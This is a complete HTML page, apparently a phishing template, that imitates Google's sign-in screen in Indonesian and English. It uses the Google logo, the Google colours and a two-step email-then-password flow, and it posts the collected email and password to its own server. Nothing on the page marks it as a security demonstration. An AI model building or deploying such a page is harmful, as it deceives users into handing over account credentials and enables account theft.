<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Masuk - Akun Google</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Roboto', Arial, sans-serif;
            background-color: #fff;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            padding: 20px;
        }

        .main-content {
            flex: 1;
            display: flex;
            align-items: center;
            justify-content: center;
            width: 100%;
        }

        .container {
            background-color: #ffffff;
            border: 1px solid #dadce0;
            border-radius: 8px;
            padding: 48px 40px 36px;
            max-width: 450px;
            width: 100%;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }

        .logo {
            text-align: center;
            margin-bottom: 10px;
        }

        .logo img {
            height: 40px;
            width: auto;
        }

        h1 {
            font-size: 24px;
            font-weight: 400;
            color: #202124;
            margin-bottom: 8px;
            margin-top: 16px;
            text-align: center;
        }

        .subtitle {
            font-size: 16px;
            color: #202124;
            margin-bottom: 24px;
            text-align: center;
        }

        .form-group {
            margin-bottom: 24px;
        }

        label {
            display: block;
            font-size: 14px;
            color: #5f6368;
            margin-bottom: 8px;
            font-weight: 400;
        }

        input[type="text"],
        input[type="email"],
        input[type="password"] {
            width: 100%;
            padding: 13px 15px;
            font-size: 16px;
            border: 1px solid #dadce0;
            border-radius: 4px;
            outline: none;
            transition: all 0.2s;
            background-color: #fff;
        }

        input[type="text"]:hover,
        input[type="email"]:hover,
        input[type="password"]:hover {
            border-color: #5f6368;
        }

        input[type="text"]:focus,
        input[type="email"]:focus,
        input[type="password"]:focus {
            border-color: #1a73e8;
            border-width: 2px;
            padding: 12px 14px;
        }

        .forgot-link {
            font-size: 14px;
            color: #1a73e8;
            text-decoration: none;
            font-weight: 500;
            display: inline-block;
            margin-top: 8px;
        }

        .forgot-link:hover {
            text-decoration: underline;
        }

        .button-container {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-top: 32px;
        }

        .create-account {
            font-size: 14px;
            color: #1a73e8;
            text-decoration: none;
            font-weight: 500;
        }

        .create-account:hover {
            text-decoration: underline;
        }

        .next-btn {
            background-color: #1a73e8;
            color: #ffffff;
            border: none;
            padding: 10px 24px;
            font-size: 14px;
            font-weight: 500;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.2s, box-shadow 0.2s;
        }

        .next-btn:hover {
            background-color: #1765cc;
            box-shadow: 0 1px 2px 0 rgba(66, 133, 244, 0.3);
        }

        .next-btn:active {
            background-color: #1557b0;
        }

        .footer {
            width: 100%;
            max-width: 450px;
            padding: 20px 0;
            margin-top: 20px;
        }

        .language-selector {
            display: flex;
            justify-content: flex-start;
            align-items: center;
            margin-bottom: 16px;
        }

        .language-selector select {
            font-size: 12px;
            color: #5f6368;
            border: none;
            background-color: transparent;
            cursor: pointer;
            padding: 4px;
            outline: none;
        }

        .language-selector select:hover {
            background-color: #f5f5f5;
        }

        .footer-links {
            display: flex;
            justify-content: flex-start;
            gap: 24px;
            font-size: 12px;
        }

        .footer-links a {
            color: #5f6368;
            text-decoration: none;
        }

        .footer-links a:hover {
            color: #202124;
        }

        .user-info {
            background-color: #f8f9fa;
            border: 1px solid #dadce0;
            border-radius: 4px;
            padding: 12px;
            margin-bottom: 16px;
            font-size: 13px;
            color: #5f6368;
        }

        .user-info strong {
            color: #202124;
        }
    </style>
</head>
<body>
    <div class="main-content">
        <div class="container">
            <div class="logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg" alt="Google">
            </div>
            
            <h1>Sign In</h1>
            
            <!-- Step 1: Email -->
            <form id="emailForm">
                <div class="form-group">
                    <label for="email">Email atau Phone Number</label>
                    <input type="text" id="email" name="email" required autofocus>
                    <a href="#" class="forgot-link">Forgot email?</a>
                </div>

                <div class="button-container">
                    <a href="#" class="create-account">Create Account</a>
                    <button type="submit" class="next-btn">Next</button>
                </div>
            </form>

            <!-- Step 2: Password (Hidden Initially) -->
            <form id="passwordForm" action="" method="POST" style="display: none;">
                <div class="form-group">
                    <div style="margin-bottom: 16px; padding: 12px; background-color: #f8f9fa; border-radius: 4px; font-size: 14px; color: #5f6368;">
                        <strong id="emailDisplay"></strong>
                    </div>
                </div>

                <div class="form-group">
                    <label for="password">Password</label>
                    <input type="password" id="password" name="password" required autofocus>
                    <a href="#" class="forgot-link">Forgot Password?</a>
                </div>

                <input type="hidden" id="emailHidden" name="email">

                <div class="button-container">
                    <button type="button" class="create-account" onclick="goBackToEmail()">Back</button>
                    <button type="submit" class="next-btn">Next</button>
                </div>
            </form>
        </div>
    </div>

    <div class="footer">
        <div class="language-selector">
            <select id="languageSelect">
                <option value="id">Bahasa Indonesia</option>
                <option value="en">English</option>
                <option value="af">Afrikaans</option>
                <option value="zh">中文</option>
                <option value="es">Español</option>
                <option value="fr">Français</option>
                <option value="de">Deutsch</option>
                <option value="ja">日本語</option>
                <option value="ko">한국어</option>
            </select>
        </div>
        <div class="footer-links">
            <a href="#">Help</a>
            <a href="#">Privacy</a>
            <a href="#">Terms</a>
        </div>
    </div>

    <script>
        // Two-step login logic
        document.getElementById('emailForm').addEventListener('submit', function(e) {
            e.preventDefault();
            const email = document.getElementById('email').value.trim();
            
            if (!email) {
                alert('Email required');
                return;
            }
            
            // Validate email format
            const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            if (!emailRegex.test(email)) {
                alert('Invalid email format');
                return;
            }
            
            // Show password step
            document.getElementById('emailForm').style.display = 'none';
            document.getElementById('passwordForm').style.display = 'block';
            document.getElementById('emailDisplay').textContent = email;
            document.getElementById('emailHidden').value = email;
            document.getElementById('password').focus();
        });

        function goBackToEmail(e) {
            if (e) e.preventDefault();
            document.getElementById('emailForm').style.display = 'block';
            document.getElementById('passwordForm').style.display = 'none';
            document.getElementById('email').focus();
        }
    </script>
</body>
</html>